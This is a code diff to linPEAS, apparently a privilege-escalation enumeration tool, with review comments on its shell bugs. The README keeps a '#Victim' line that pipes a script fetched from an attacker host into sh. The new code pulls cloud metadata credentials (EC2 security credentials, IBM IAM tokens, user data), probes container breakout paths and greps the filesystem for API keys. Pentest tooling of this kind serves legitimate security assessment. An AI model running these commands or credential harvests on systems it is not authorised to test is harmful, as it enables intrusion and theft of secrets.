diff --git a/.github/workflows/CI-master_tests.yml b/.github/workflows/CI-master_tests.yml index cb29333..4900faf 100644 --- a/.github/workflows/CI-master_tests.yml +++ b/.github/workflows/CI-master_tests.yml @@ -1,6 +1,10 @@ name: CI-master_test -on: +on: + pull_request: + branches: + - master + schedule: - cron: "5 4 * * SUN" @@ -194,8 +198,36 @@ jobs: run: linPEAS/linpeas.sh -h # Run linpeas as a test - - name: Run linpeas - run: linPEAS/linpeas.sh -a -D + - name: Run linpeas system_information + run: linPEAS/linpeas.sh -o system_information -a + + - name: Run linpeas container + run: linPEAS/linpeas.sh -o container -a + + - name: Run linpeas cloud + run: linPEAS/linpeas.sh -o cloud -a + + - name: Run linpeas procs_crons_timers_srvcs_sockets + run: linPEAS/linpeas.sh -o procs_crons_timers_srvcs_sockets -a + + - name: Run linpeas network_information + run: linPEAS/linpeas.sh -o network_information -t -a + + - name: Run linpeas users_information + run: linPEAS/linpeas.sh -o users_information -a + + - name: Run linpeas software_information + run: linPEAS/linpeas.sh -o software_information -a + + - name: Run linpeas interesting_perms_files + run: linPEAS/linpeas.sh -o interesting_perms_files -a + + - name: Run linpeas interesting_files + run: linPEAS/linpeas.sh -o interesting_files -a + + # Too much time + #- name: Run linpeas api_keys_regex + # run: linPEAS/linpeas.sh -o api_keys_regex -r # Upload files for release - name: Upload linpeas.sh @@ -204,6 +236,12 @@ jobs: name: linpeas.sh path: linPEAS/linpeas.sh + - name: Upload linpeas_fat.sh + uses: actions/upload-artifact@v2 + with: + name: linpeas_fat.sh + path: linPEAS/linpeas_fat.sh + ## Linux bins - name: Upload linpeas_linux_386 uses: actions/upload-artifact@v2 
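Review bot: With the `api_keys_regex` step commented out ("Too much time"), the section added in `linPEAS/builder/linpeas_parts/10_api_keys_regex.sh` is the one new part of the script CI never executes, so a shell error there would surface only on a user's host. A cheap guard that costs no runtime is a syntax pass over the assembled script, `run: sh -n linPEAS/linpeas.sh`, placed before the per-section runs. Separately, the `network_information` step passes `-t`, which per the README hunk further down in this diff performs the network scan and "writes to files"; if that is not intended for every pull-request run, drop `-t` there or note why it is wanted.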
@@ -330,6 +368,11 @@ jobs: uses: actions/download-artifact@v2 with: name: linpeas.sh + + - name: Download linpeas_fat.sh + uses: actions/download-artifact@v2 + with: + name: linpeas_fat.sh - name: Download linpeas_linux_386 uses: actions/download-artifact@v2 @@ -384,4 +427,3 @@ jobs: assets_path: . env: GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }} - diff --git a/linPEAS/README.md b/linPEAS/README.md index 1f89083..bed73a5 100755 --- a/linPEAS/README.md +++ b/linPEAS/README.md @@ -22,7 +22,7 @@ curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas ```bash # Local network -sudo python -m http.server 80 #Host +sudo python3 -m http.server 80 #Host curl 10.10.10.10/linpeas.sh | sh #Victim # Without curl @@ -47,12 +47,6 @@ chmod +x linpeas_linux_amd64 ./linpeas_linux_amd64 ``` -```bash -# Execute from memory in Penelope session -# From: https://github.com/brightio/penelope -> run peass-ng -``` - ## Firmware Analysis If you have a **firmware** and you want to **analyze it with linpeas** to **search for passwords or bad configured permissions** you have 2 main options. @@ -107,7 +101,7 @@ By default linpeas takes around **4 mins** to complete, but It could take from * - **-D** (Debug) - Print information about the checks that haven't discovered anything and about the time each check took - **-d/-p/-i/-t** (Local Network Enumeration) - Linpeas can also discover and port-scan local networks -This script has **several lists** included inside of it to be able to **color the results** in order to highlight PE vector. +**It's recommended to use the params `-a` and `-r` if you are looking for a complete and intensive scan**. ``` Enumerate and search Privilege Escalation vectors. 
@@ -119,11 +113,11 @@ This tool enum and search possible misconfigurations (known vulns, user, process -t Automatic network scan & Internet conectivity checks - This option writes to files -r Enable Regexes (this can take from some mins to hours) -P Indicate a password that will be used to run 'sudo -l' and to bruteforce other users accounts via 'su' - -D Debug mode + -D Debug mode Network recon: -t Automatic network scan & Internet conectivity checks - This option writes to files - -d Discover hosts using fping or ping. Ex: -d 192.168.0.1/24 + -d Discover hosts using fping or ping. Ex: -d 192.168.0.1/24 -p -d Discover hosts looking for TCP open ports (via nc). By default ports 22,80,443,445,3389 and another one indicated by you will be scanned (select 22 if you don't want to add more). You can also add a list of ports. Ex: -d 192.168.0.1/24 -p 53,139 -i [-p ] Scan an IP using nc. By default (no -p), top1000 of nmap will be scanned, but you can select a list of ports instead. Ex: -i 127.0.0.1 -p 53,80,443,8000,8080 Notice that if you specify some network scan (options -d/-p/-i but NOT -t), no PE check will be performed @@ -136,10 +130,10 @@ This tool enum and search possible misconfigurations (known vulns, user, process Misc: -h To show this message - -w Wait execution between big blocks of checks + -w Wait execution between big blocks of checks -L Force linpeas execution -M Force macpeas execution - -q Do not show banner + -q Do not show banner -N Do not use colours ``` diff --git a/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh b/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh new file mode 100644 index 0000000..dc40ecf --- /dev/null +++ b/linPEAS/builder/linpeas_parts/10_api_keys_regex.sh 
@@ -0,0 +1,48 @@
+
+search_for_regex(){
+ title=$1
+ regex=$2
+ caseSensitive=$3
+
+ if [ "$caseSensitive" ]; then
+ i="i"
+ else
+ i=""
+ fi
+
+ print_3title_no_nl "Searching $title..."
+
+ if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find "$ROOT_FOLDER" -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ else
+ # Search in home direcoties (usually the slowest)
+ timeout 120 find $HOMESEARCH -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+
+ # Search in etc
+ timeout 120 find /etc -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+
+ # Search in opt
+ timeout 120 find /opt -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+
+ # Search in possible web folders (usually only 1 will exist)
+ timeout 120 find /var/www /usr/local/www /usr/share/nginx /Library/WebServer/ -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+
+ # Search in logs
+ timeout 120 find /var/log /var/logs /Library/Logs -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+
+ # Search in backups
+ timeout 120 find $backup_folders_row -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+
+ # Search in others folders (usually only /srv or /Applications will exist)
+ timeout 120 find /tmp /srv /Applications -type f -not -path "*/node_modules/*" -exec grep -HnRIE$i "$regex" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ fi
+ wait
+}
+
+
+
+if [ "$REGEXES" ] && [ "$TIMEOUT"
]; then
+ peass{REGEXES}
+else
+ echo "Regexes to search for API keys aren't activated, use param '-r' "
+fi
\ No newline at end of file
diff --git a/linPEAS/builder/linpeas_parts/1_system_information.sh b/linPEAS/builder/linpeas_parts/1_system_information.sh
index 06bd7a1..c0eb806 100644
--- a/linPEAS/builder/linpeas_parts/1_system_information.sh
+++ b/linPEAS/builder/linpeas_parts/1_system_information.sh
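Review bot: The `caseSensitive` parameter of `search_for_regex` does the opposite of its name: a non-empty value sets `i="i"`, which turns the grep into `grep -HnRIEi`, i.e. a case-insensitive search, so either the parameter should be renamed `caseInsensitive` or the two branches swapped; the callers come from the generated `peass{REGEXES}` block, which is not visible here, so I cannot tell which direction is the intended one. Every `find … -exec grep -HnRIE$i "$regex" '{}' \;` also forks one grep per file, and `-R` is a no-op when grep is handed a single regular file; `-exec grep -HnIE$i "$regex" '{}' +` batches the paths with the same output. `$HOMESEARCH` and `$backup_folders_row` are deliberately left unquoted so they split into several directories, which deserves a `# intentionally unquoted: space-separated list of folders` comment because it reads like a quoting bug.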
@@ -21,42 +21,6 @@ else echo_not_found "sudo" fi echo "" -#-- SY) CVEs -print_2title "CVEs Check" - -#-- SY) CVE-2021-4034 -if [ `command -v pkexec` ] && stat -c '%a' $(which pkexec) | grep -q 4755 && [ "$(stat -c '%Y' $(which pkexec))" -lt "1641942000" ]; then - echo "Vulnerable to CVE-2021-4034" | sed -${E} "s,.*,${SED_RED_YELLOW}," - echo "" -fi - -#-- SY) CVE-2021-3560 -polkitVersion=$(systemctl status polkit.service 2>/dev/null | grep version | cut -d " " -f 9) -if [ "$(apt list --installed 2>/dev/null | grep polkit | grep -c 0.105-26)" -ge 1 ] || [ "$(yum list installed 2>/dev/null | grep polkit | grep -c 0.117-2)" -ge 1 ]; then - echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW}," - echo "" -fi - -#-- SY) CVE-2022-0847 -#-- https://dirtypipe.cm4all.com/ -#-- https://stackoverflow.com/a/37939589 -kernelversion=$(uname -r | awk -F"-" '{print $1}') -kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') -if [ $kernelnumber -ge 5008000000 ] && [ $kernelnumber -lt 5017000000 ]; then # if kernel version between 5.8 and 5.17 - echo "Potentially Vulnerable to CVE-2022-0847" | sed -${E} "s,.*,${SED_RED}," - echo "" -fi - -#-- SY) CVE-2022-2588 -#-- https://github.com/Markakd/CVE-2022-2588 -kernelversion=$(uname -r | awk -F"-" '{print $1}') -kernelnumber=$(echo $kernelversion | awk -F. '{ printf("%d%03d%03d%03d\n", $1,$2,$3,$4); }') -if [ $kernelnumber -ge 3017000000 ] && [ $kernelnumber -lt 5019000000 ]; then # if kernel version between 3.17 and 5.19 - echo "Potentially Vulnerable to CVE-2022-2588" | sed -${E} "s,.*,${SED_RED}," - echo "" -fi -echo "" - #--SY) USBCreator if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then print_2title "USBCreator" 
@@ -83,9 +47,10 @@ print_2title "PATH" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses" if ! [ "$IAMROOT" ]; then echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g" - echo "New path exported: $PATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\. ,${SED_RED_YELLOW},g" -else - echo "New path exported: $PATH" 2>/dev/null +fi + +if [ "$DEBUG" ]; then + echo "New path exported: $PATH" fi echo "" @@ -196,6 +161,10 @@ else echo_not_found "AppArmor" fi +#-- SY) LinuxONE +print_list "is linuxONE? ................... "$NC +( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x") + #-- SY) grsecurity print_list "grsecurity present? ............ "$NC ( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity") @@ -214,11 +183,11 @@ print_list "SELinux enabled? ............... "$NC #-- SY) Seccomp print_list "Seccomp enabled? ............... "$NC -([ "$(grep Seccomp /proc/self/status | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," +([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," #-- SY) AppArmor print_list "AppArmor profile? .............. "$NC -(cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," +(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN}," #-- SY) AppArmor print_list "User namespace? ................ "$NC 
@@ -226,7 +195,7 @@ if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,ena #-- SY) cgroup2 print_list "Cgroup2 enabled? ............... "$NC -([ "$(grep cgroup2 /proc/filesystems)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," +([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN}," #-- SY) Gatekeeper if [ "$MACPEAS" ]; then diff --git a/linPEAS/builder/linpeas_parts/2_container.sh b/linPEAS/builder/linpeas_parts/2_container.sh index 9f3b882..b97aca4 100644 --- a/linPEAS/builder/linpeas_parts/2_container.sh +++ b/linPEAS/builder/linpeas_parts/2_container.sh 
@@ -137,16 +137,48 @@ checkContainerExploits() { fi } +checkCreateReleaseAgent(){ + cat /proc/$$/cgroup 2>/dev/null | grep -Eo '[0-9]+:[^:]+' | grep -Eo '[^:]+$' | while read -r subsys + do + if unshare -UrmC --propagation=unchanged bash -c "mount -t cgroup -o $subsys cgroup /tmp/cgroup_3628d4 2>&1 >/dev/null && test -w /tmp/cgroup_3628d4/release_agent" >/dev/null 2>&1 ; then + release_agent_breakout2="Yes (unshare with $subsys)"; + rm -rf /tmp/cgroup_3628d4 + break + fi + done +} + checkProcSysBreakouts(){ - if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then release_agent_breakout1="Yes"; else release_agent_breakout1="No"; fi + run_unshare=$(unshare -UrmC bash -c 'echo -n Yes' 2>/dev/null) + if ! [ "$run_unshare" = "Yes" ]; then + run_unshare="No" + fi + + if [ "$(ls -l /sys/fs/cgroup/*/release_agent 2>/dev/null)" ]; then + release_agent_breakout1="Yes" + else + release_agent_breakout1="No" + fi + release_agent_breakout2="No" mkdir /tmp/cgroup_3628d4 mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4 2>/dev/null - if [ $? -eq 0 ]; then release_agent_breakout2="Yes"; else release_agent_breakout2="No"; fi + if [ $? -eq 0 ]; then + release_agent_breakout2="Yes"; + rm -rf /tmp/cgroup_3628d4 + else + mount -t cgroup -o rdma cgroup /tmp/cgroup_3628d4 2>/dev/null + if [ $? 
-eq 0 ]; then + release_agent_breakout2="Yes"; + rm -rf /tmp/cgroup_3628d4 + else + checkCreateReleaseAgent + fi + fi rm -rf /tmp/cgroup_3628d4 2>/dev/null core_pattern_breakout="$( (echo -n '' > /proc/sys/kernel/core_pattern && echo Yes) 2>/dev/null || echo No)" - modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` || echo No)" + modprobe_present="$(ls -l `cat /proc/sys/kernel/modprobe` 2>/dev/null || echo No)" panic_on_oom_dos="$( (echo -n '' > /proc/sys/vm/panic_on_oom && echo Yes) 2>/dev/null || echo No)" panic_sys_fs_dos="$( (echo -n '' > /proc/sys/fs/suid_dumpable && echo Yes) 2>/dev/null || echo No)" binfmt_misc_breakout="$( (echo -n '' > /proc/sys/fs/binfmt_misc/register && echo Yes) 2>/dev/null || echo No)" @@ -258,8 +290,8 @@ if [ "$inContainer" ]; then echo "" print_2title "Container & breakout enumeration" print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname && echo '')" - if echo "$containerType" | grep -qi "docker"; then + print_list "Container ID ...................$NC $(cat /etc/hostname && echo -n '\n')" + if [ -f "/proc/1/cpuset" ] && echo "$containerType" | grep -qi "docker"; then print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" fi print_list "Seccomp enabled? ............... "$NC 
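Review bot: In `checkCreateReleaseAgent` the assignment `release_agent_breakout2="Yes (unshare with $subsys)"` runs inside the `cat … | grep … | while read -r subsys` pipeline, i.e. in a subshell, so it never reaches `checkProcSysBreakouts` and the printed value stays "No" even when the unshare mount succeeded; iterating without a pipe keeps the assignment in the calling shell, e.g. `for subsys in $(grep -Eo '[0-9]+:[^:]+' /proc/$$/cgroup 2>/dev/null | grep -Eo '[^:]+$'); do`. The same pattern loses `CURRENT_USER_PIVOT_PID` in the new `ps -eo pid,ppid,user | grep -v "PPID" | while read -r …` loop in 4_procs_crons_timers_srvcs_sockets.sh, a value 6_users_information.sh later reads. Also, when `mount -t cgroup -o memory cgroup /tmp/cgroup_3628d4` succeeds the directory is a live mount point and `rm -rf /tmp/cgroup_3628d4` fails with EBUSY, leaving the cgroup hierarchy mounted under /tmp after the scan; an `umount /tmp/cgroup_3628d4 2>/dev/null` before each `rm -rf` is needed.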
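Review bot: `echo -n '\n'` inside the Container ID command substitution is not portable: bash's builtin echo prints the two characters `\n` (which the format string then presumably renders as a newline), while dash's echo emits a real newline that `$(…)` strips, so the line ends differently depending on which shell runs linpeas. Putting the escape in the `print_list` string, as the neighbouring calls do, removes the difference: `print_list "Container ID ...................$NC $(cat /etc/hostname)\n"`.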
@@ -269,7 +301,7 @@ if [ "$inContainer" ]; then (cat /proc/self/attr/current 2>/dev/null || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,kernel,${SED_GREEN}," print_list "User proc namespace? ........... "$NC - if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi + if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then (printf "enabled"; cat /proc/self/uid_map) | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi checkContainerExploits print_list "Vulnerable to CVE-2019-5021 .... $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -278,7 +310,8 @@ if [ "$inContainer" ]; then print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts" checkProcSysBreakouts - print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," + print_list "Run ushare ..................... $run_unshare\n" | sed -${E} "s,Yes,${SED_RED}," + print_list "release_agent breakout 1........ $release_agent_breakout1\n" | sed -${E} "s,Yes,${SED_RED}," print_list "release_agent breakout 2........ $release_agent_breakout2\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "core_pattern breakout .......... $core_pattern_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," print_list "binfmt_misc breakout ........... $binfmt_misc_breakout\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," @@ -345,6 +378,7 @@ if [ "$inContainer" ]; then capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" else cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g" + echo $ITALIC"Run capsh --decode= to decode the capabilities"$NC fi echo "" 
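Review bot: The user-namespace check still prints "enabled" whenever `/proc/self/uid_map` is readable, which is also the case in the initial user namespace, where the map is the identity `0 0 4294967295`; echoing the map (the new part) lets a reader notice this, but the green label is still misleading. Treating the identity map as not-enabled is a one-line change: `if [ "$(grep -v '^ *0 *0 *4294967295$' /proc/self/uid_map 2>/dev/null)" ]; then …`. The `User namespace?` line in 1_system_information.sh has the same shape and would want the same treatment.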
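Review bot: The new label `Run ushare` is a typo for `unshare`, the command `run_unshare` actually executes; it should read `print_list "Run unshare .................... $run_unshare\n"`, with the dot padding trimmed by one so the columns stay aligned with the other breakout lines.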
diff --git a/linPEAS/builder/linpeas_parts/3_cloud.sh b/linPEAS/builder/linpeas_parts/3_cloud.sh index 59a32fd..7936cf8 100644 --- a/linPEAS/builder/linpeas_parts/3_cloud.sh +++ b/linPEAS/builder/linpeas_parts/3_cloud.sh @@ -7,7 +7,10 @@ GCP_BAD_SCOPES="/cloud-platform|/compute" exec_with_jq(){ if [ "$(command -v jq)" ]; then - $@ | jq; + $@ | jq 2>/dev/null; + if ! [ $? -eq 0 ]; then + $@; + fi else $@; fi @@ -20,6 +23,24 @@ check_gcp(){ fi } +check_do(){ + is_do="No" + if [ -f "/etc/cloud/cloud.cfg.d/90-digitalocean.cfg" ]; then + is_do="Yes" + fi +} + +check_ibm_vm(){ + is_ibm_vm="No" + if grep -q "nameserver 161.26.0.10" "/etc/resolv.conf" && grep -q "nameserver 161.26.0.11" "/etc/resolv.conf"; then + curl --connect-timeout 2 "http://169.254.169.254" > /dev/null 2>&1 || wget --timeout 2 --tries 1 "http://169.254.169.254" > /dev/null 2>&1 + if [ "$?" -eq 0 ]; then + IBM_TOKEN=$( ( curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" -H "Metadata-Flavor: ibm" -H "Accept: application/json" 2> /dev/null | cut -d '"' -f4 ) || ( wget --tries 1 -O - --method PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01" --header "Metadata-Flavor: ibm" --header "Accept: application/json" 2>/dev/null | cut -d '"' -f4 ) ) + is_ibm_vm="Yes" + fi + fi +} + check_aws_ecs(){ is_aws_ecs="No" if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then @@ -34,11 +55,6 @@ check_aws_ecs(){ elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then is_aws_ecs="Yes"; - - - elif (curl --connect-timeout 2 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]); then - is_aws_ecs="Yes"; - fi if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then @@ -48,6 +64,7 @@ check_aws_ecs(){ check_aws_ec2(){ is_aws_ec2="No" + is_aws_ec2_beanstalk="No" if [ -d "/var/log/amazon/" ]; then is_aws_ec2="Yes" 
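Review bot: The fallback added to `exec_with_jq` re-executes `$@` whenever `jq` exits non-zero, which means a second metadata request for every non-JSON response and, for the IBM `iam_token` POST added later in this diff, a second token issuance; the first response is also discarded rather than shown raw. Capturing the output once avoids both: `out=$("$@"); printf '%s\n' "$out" | jq 2>/dev/null || printf '%s\n' "$out"`. Note that `$?` after the pipeline is jq's status, so a failing command whose empty output jq accepts is not detected by the new check either.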
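Review bot: In `check_ibm_vm` the `( curl … | cut … ) || ( wget … | cut … )` fallback never runs when curl is absent, because the status of the left side is that of `cut` (success), not curl's; on a wget-only host `IBM_TOKEN` is therefore empty while `is_ibm_vm` is still set to "Yes". Choosing the client first, the way the DO and IBM enumeration blocks pick `do_req`/`ibm_req`, fixes it: `if [ "$(command -v curl)" ]; then IBM_TOKEN=$(curl … | cut -d '"' -f4); else IBM_TOKEN=$(wget … | cut -d '"' -f4); fi`. The two `grep -q "nameserver …" "/etc/resolv.conf"` probes also print an error when the file is missing; `grep -qs` keeps them silent.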
@@ -59,6 +76,10 @@ check_aws_ec2(){ is_aws_ec2="Yes" fi fi + + if [ "$is_aws_ec2" = "Yes" ] && grep -iq "Beanstalk" "/etc/motd"; then + is_aws_ec2_beanstalk="Yes" + fi } check_aws_lambda(){ @@ -76,8 +97,13 @@ check_aws_ecs print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," check_aws_ec2 print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +print_list "AWS EC2 Beanstalk? ................... $is_aws_ec2_beanstalk\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," check_aws_lambda print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_do +print_list "DO Droplet? .......................... $is_do\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," +check_ibm_vm +print_list "IBM Cloud VM? ........................ $is_ibm_vm\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN}," echo "" @@ -157,6 +183,11 @@ if [ "$is_gcp" = "Yes" ]; then echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network") echo " ============== " done + + echo "" + print_3title "User Data" + echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script") + echo "" echo "" print_3title "Service Accounts" @@ -259,7 +290,14 @@ if [ "$is_aws_ec2" = "Yes" ]; then echo "" print_3title "User Data" - eval $aws_req "http://169.254.169.254/latest/user-data" + eval $aws_req "http://169.254.169.254/latest/user-data"; echo "" + + echo "" + echo "EC2 Security Credentials" + exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo "" + + print_3title "SSM Runnig" + ps aux 2>/dev/null | grep "ssm-agent" | grep -v "grep" | sed "s,ssm-agent,${SED_RED}," fi fi 
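Review bot: `grep -iq "Beanstalk" "/etc/motd"` prints a "No such file or directory" error on EC2 hosts without an `/etc/motd`, unlike the `-d` test above it; `grep -iqs "Beanstalk" "/etc/motd"` keeps the check silent.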
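Review bot: `echo $(eval $gcp_req "…/attributes/startup-script")` word-splits and glob-expands the fetched startup script, collapsing its line structure and expanding any `*` it contains, which makes a user-data script hard to read and can mangle it. The form used for AWS user-data in the next hunk preserves it: `eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script"; echo ""`.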
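Review bot: `print_3title "SSM Runnig"` is a typo for `SSM Running`, and the new security-credentials line uses `$URL`, which is not set anywhere in this hunk; if it is meant to be the EC2 metadata base it should be assigned nearby, or the literal `http://169.254.169.254/latest` used as the user-data line just above does. The "EC2 Security Credentials" header is also a bare `echo` while the sibling headers use `print_3title`, so it will not be styled like them.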
@@ -275,3 +313,65 @@ if [ "$is_aws_lambda" = "Yes" ]; then printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next") fi +if [ "$is_do" = "Yes" ]; then + print_2title "DO Droplet Enumeration" + + do_req="" + if [ "$(command -v curl)" ]; then + do_req='curl -s -f ' + elif [ "$(command -v wget)" ]; then + do_req='wget -q -O - ' + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + if [ "$do_req" ]; then + URL="http://169.254.169.254/metadata" + printf "Id: "; eval $do_req "$URL/v1/id"; echo "" + printf "Region: "; eval $do_req "$URL/v1/region"; echo "" + printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo "" + printf "User data: "; eval $do_req "$URL/v1/user-data"; echo "" + printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo "" + printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces"; + printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip"; + printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip"; + printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags"; + printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features"; + fi +fi + +if [ "$is_ibm_vm" = "Yes" ]; then + print_2title "IBM Cloud Enumeration" + + if ! 
[ "$IBM_TOKEN" ]; then + echo "Couldn't get the metdata token:(" + + else + TOKEN_HEADER="Authorization: Bearer $IBM_TOKEN" + ACCEPT_HEADER="Accept: application/json" + URL="http://169.254.169.254/latest/meta-data" + + ibm_req="" + if [ "$(command -v curl)" ]; then + ibm_req="curl -s -f -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" + elif [ "$(command -v wget)" ]; then + ibm_req="wget -q -O - -H '$TOKEN_HEADER' -H '$ACCEPT_HEADER'" + else + echo "Neither curl nor wget were found, I can't enumerate the metadata service :(" + fi + + print_3title "Instance Details" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" + + print_3title "Keys and User data" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" + + print_3title "Placement Groups" + exec_with_jq eval $ibm_req "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" + + print_3title "IAM credentials" + exec_with_jq eval $ibm_req -X POST "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" + fi + +fi diff --git a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh index 0a1d8c8..1d54671 100644 --- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh +++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh 
